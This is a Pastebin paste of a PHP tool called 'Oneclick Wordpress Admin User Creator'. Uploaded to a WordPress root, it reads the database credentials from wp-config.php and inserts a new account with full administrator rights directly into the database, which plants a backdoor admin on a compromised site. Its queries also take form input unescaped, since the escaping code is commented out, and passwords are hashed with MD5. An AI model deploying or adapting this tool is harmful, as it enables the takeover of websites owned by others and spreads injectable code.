Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /******************************
- * Oneclick Wordpress Admin User Creator
- * Author - CHETAN SONI
- * Twitter - http://twitter.com/iamchetansoni
- * ****************************/
- // configurables
- $wpconf = "wp-config.php";
- $usrtbl = "users";
- $usrmta = "usermeta";
- // sql data
- $sqltbl = "INSERT INTO `%prefix%$usrtbl` (`user_login`,`user_pass`,`user_nicename`,`user_email`,`user_url`,`user_registered`,`user_activation_key`,`user_status`,`display_name`) VALUES ('%usrname%',MD5('%usrpass%'),'%usrnice%','%usrmail%','',NOW(),'','0','%usrnice%')";
- $sqlid = "SELECT `id` FROM `%prefix%$usrtbl` WHERE `user_login` = '%usrname%'";
- $sqlmta = "INSERT INTO `%prefix%$usrmta` (`user_id`,`meta_key`,`meta_value`) VALUES ('%usrid%','%prefix%capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}')";
- $sqlmta2 = "INSERT INTO `%prefix%$usrmta` (`user_id`,`meta_key`,`meta_value`) VALUES ('%usrid%','%prefix%user_level','10')";
- // defaults
- $prefix = "wp_";
- $usrname = "";
- $usrpass = "";
- $usrnice = "";
- $usrmail = "";
- $errors = array();
- // helper functions
- function msg($msg,$type=""){
- echo "<div class=\"alert $type\">$msg</div>\n";
- }
- function getusrid($query){
- $result = @mysql_query ($query);
- $row = @mysql_fetch_array ($result, MYSQL_ASSOC);
- return $row['id'];
- }
- function box($arr,$classes=""){
- if (count($arr)>0):
- echo "<div class=\"alert $classes\">\n";
- foreach ($arr as $a): echo "$a<br />\n"; endforeach;
- echo "</div>\n";
- endif;
- }
- function filter($input,$keys=array(),$vals=array()){
- $data = str_replace($keys,$vals,$input);
- if (ini_get('magic_quotes_gpc')) { $data = stripslashes($data); }
- // if (function_exists('mysql_real_escape_string')) {
- // global $dbc; // Need the connection.
- // $data = mysql_real_escape_string (trim($data), $dbc);
- // } else { $data = mysql_escape_string (trim($data)); } //
- return $data;
- }
- ?><!DOCTYPE html>
- <html>
- <head>
- <title>Oneclick Wordpress Admin User Creator</title>
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
- <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0-wip/css/bootstrap.min.css">
- <script src="//netdna.bootstrapcdn.com/bootstrap/3.0.0-wip/js/bootstrap.min.js"></script>
- <script src="//code.jquery.com/jquery.js"></script>
- <style type="text/css">
- body { background: #000000; }
- a { color: #bf4c26; }
- a:hover { color: #222; }
- .wrapper { background: white; border: 1px solid #eee; padding: 10px; width: 800px; margin: 30px auto 0; border-radius: 12px; }
- .ver { width: 800px; margin: 5px auto; color: #999; font-size: 11px; }
- .theform { display: block; border: 1px solid #efefef; padding: 10px; margin: 10px 0; border-radius: 6px;}
- </style>
- </head>
- <body>
- <center><img src="http://i.imgur.com/3GqsquD.png"></center>
- <div class="wrapper">
- <center> <h2> <b>Oneclick Wordpress Admin User Creator</b></h2></center><hr>
- <?php
- if (file_exists($wpconf)):
- // wp config file found
- include_once($wpconf);
- if (defined('DB_NAME')&&defined('DB_USER')&&defined('DB_PASSWORD')&&defined('DB_HOST')):
- // db data found
- echo "<center>Yippie we got the details, <span style=\"color: green\">Database Name = <b>".DB_USER."</b></span> and <span style=\"color: green\">Database User = <b>".DB_NAME."</b></span></center>";
- if ($dbc = @mysql_connect(DB_HOST,DB_USER,DB_PASSWORD)):
- // sql connect successful
- if (@mysql_select_db(DB_NAME)):
- // sql db select successful
- echo "<span style=\"color: green\"><b></b></span>\n<br />";
- if (isset($_POST['sub'])):
- // form submitted, process and show results
- //print_r($_POST);
- if (isset($_POST['prefix'])&&(strlen($_POST['prefix'])>0)): $prefix = trim($_POST['prefix']); else: $errors[] = "You did not fill in the table prefix"; endif;
- if (isset($_POST['usrname'])&&(strlen($_POST['usrname'])>0)): $usrname = trim($_POST['usrname']); else: $errors[] = "You did not fill in the username"; endif;
- if (isset($_POST['usrpass'])&&(strlen($_POST['usrpass'])>0)): $usrpass = trim($_POST['usrpass']); else: $errors[] = "You did not fill in the password"; endif;
- if (isset($_POST['usrnice'])&&(strlen($_POST['usrnice'])>0)): $usrnice = trim($_POST['usrnice']); else: $errors[] = "You did not fill in the display username"; endif;
- if (isset($_POST['usrmail'])&&(strlen($_POST['usrmail'])>0)): $usrmail = trim($_POST['usrmail']); else: $errors[] = "You did not fill in the email address"; endif;
- if (count($errors)==0):
- // form submitted successfully
- $sqltbl = filter($sqltbl,array("%prefix%","%usrname%","%usrpass%","%usrnice%","%usrmail%"),array($prefix,$usrname,$usrpass,$usrnice,$usrmail));
- if ($result = @mysql_query ($sqltbl)):
- $sqlid = filter($sqlid,array("%prefix%","%usrname%"),array($prefix,$usrname));
- $id = getusrid($sqlid);
- $sqlmta = filter($sqlmta,array("%prefix%","%usrid%"),array($prefix,$id));
- $sqlmta2 = filter($sqlmta2,array("%prefix%","%usrid%"),array($prefix,$id));
- if (!@mysql_query ($sqlmta)): $errors[] = "<b>Failed to add user metadata!</b> ".mysql_error(); endif;
- if (!@mysql_query ($sqlmta2)): $errors[] = "<b>Failed to add user metadata #2!</b> ".mysql_error(); endif;
- else: $errors[] = "<b>Failed to add user!</b> ".mysql_error();
- endif;
- //echo "$sqltbl<br />$sqlid<br />$sqlmta<br />$sqlmta2";
- if (count($errors)==0):
- box(array("<b>User added successfully.</b><br />Please login to your dashboard, <a href=\"wp-admin/\">Click Here</a>."),"alert-success");
- endif;
- endif;
- endif;
- // display form
- box($errors,"alert-danger");
- ?>
- <form role="form" action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="POST" class="theform form-horizontal">
- <div class="row">
- <fieldset>
- <div class="form-group">
- <label for="prefix" class="col-lg-2 control-label">Table prefix</label>
- <div class="col-lg-3"><input type="text" class="form-control" name="prefix" id="prefix" placeholder="username" value="wp_" value="<?php echo $usrprefix; ?>"></div>
- </div>
- <div class="form-group">
- <label for="usrname" class="col-lg-2 control-label">Username</label>
- <div class="col-lg-6"><input type="text" class="form-control" name="usrname" id="usrname" placeholder="Enter New Username" value="<?php echo $usrname; ?>"></div>
- </div>
- <div class="form-group">
- <label for="usrpass" class="col-lg-2 control-label">Password</label>
- <div class="col-lg-6"><input type="password" class="form-control" id="usrpass" name="usrpass" placeholder="Enter New Password" value="<?php echo $usrpass; ?>"></div>
- </div>
- <div class="form-group">
- <label for="usrnice" class="col-lg-2 control-label">Display Name</label>
- <div class="col-lg-6"><input type="text" class="form-control" name="usrnice" id="usrnice" placeholder="Enter Your Display Name" value="<?php echo $usrnice; ?>"></div>
- </div>
- <div class="form-group">
- <label for="usrmail" class="col-lg-2 control-label">E-mail ID</label>
- <div class="col-lg-6"><input type="email" class="form-control" name="usrmail" id="usrmail" placeholder="Enter Your E-mail ID" value="<?php echo $usrmail; ?>"></div>
- </div>
- <div class="form-group">
- <div class="col-lg-offset-2 col-lg-6">
- <button type="submit" class="btn btn-primary">Add User</button>
- </div>
- </div>
- </fieldset>
- </div>
- <input type="hidden" name="sub" value="0">
- </form>
- <?
- mysql_close($dbc);
- else:
- // sql select failed
- msg("Unable to select the database.","alert-danger");
- endif;
- else:
- // unable to connect to sql
- msg("Unable to connect the database.","alert-danger");
- endif;
- else:
- // missing db data
- msg("Check your <b>wp-login.php</b> file","");
- endif;
- else:
- // missing wp config file
- msg("Unable to locate <b>wp-config.php</b>. Make sure you have uploaded this script to the root of your Wordpress installation.","alert-danger");
- endif;
- ?>
- </div><!--wrapper-->
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
